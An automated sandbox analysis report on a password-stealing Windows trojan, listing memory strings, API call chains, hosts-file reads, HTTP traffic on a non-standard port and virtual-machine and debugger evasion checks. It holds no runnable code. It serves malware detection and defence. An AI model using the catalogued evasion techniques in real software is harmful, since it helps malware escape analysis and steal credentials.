                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.260994800.0000000008210000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmpString found in binary or memory: https://wtfismyip.com/text
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275067190.00000000058AB000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.269668764.000000000070A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00408C60
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_0040DC11
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00407C3F
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00418CCC
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00406CA0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004028B0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_0041A4BE
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00418244
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00401650
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00402F20
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004193C4
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00418788
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00402F89
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00402B90
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004073A0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_024F1638
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_024FC9D0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_024FF2E0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_051008E3
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: String function: 0040E1D8 appears 44 times
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.278243802.00000000077B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCloisters.exe4 vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.206914545.0000000000789000.00000004.00000001.sdmpBinary or memory string: OriginalFilename_.dll4 vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275691984.0000000005D50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.278226031.00000000077A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.278274277.00000000077C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewmiutils.dll.muij% vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.278368604.0000000007800000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.277892249.0000000006E50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameaspnet_rc.dllT vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeBinary or memory string: OriginalFilenameCloisters.exe4 vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, RELOCS_STRIPPED
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeStatic PE information: Section: .rsrc ZLIB complexity 0.988744491186
                      Source: classification engineClassification label: mal88.troj.spyw.evad.winEXE@1/21@3/2
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeFile created: C:\Users\user\AppData\Local\Temp\tmp76A9.tmpJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCommand line argument: 08A
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeVirustotal: Detection: 74%
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeMetadefender: Detection: 27%
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeReversingLabs: Detection: 75%
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: _.pdb source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmp
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeStatic PE information: real checksum: 0x23bfb should be: 0x45256
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_0040E21D push ecx; ret
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_024FD0C1 pushad ; iretd
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_0510EC7A push 8B0876FFh; retf

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Uses known network protocols on non-standard portsShow sources
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 3214
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 3214
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 3214
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49728
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeWindow / User API: threadDelayed 2750
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeWindow / User API: threadDelayed 5689
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe TID: 6964Thread sleep time: -11990383647911201s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275112004.00000000058E5000.00000004.00000001.sdmpBinary or memory string: VMware
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275112004.00000000058E5000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware_KWC4Y56Win32_VideoControllerAXZNRU94VideoController120060621000000.000000-00026994397display.infMSBDAUCR_NBGZPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsP7N5LX5Al
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275691984.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmpBinary or memory string: VMWare
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275691984.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275691984.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.269777182.00000000007D3000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275691984.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
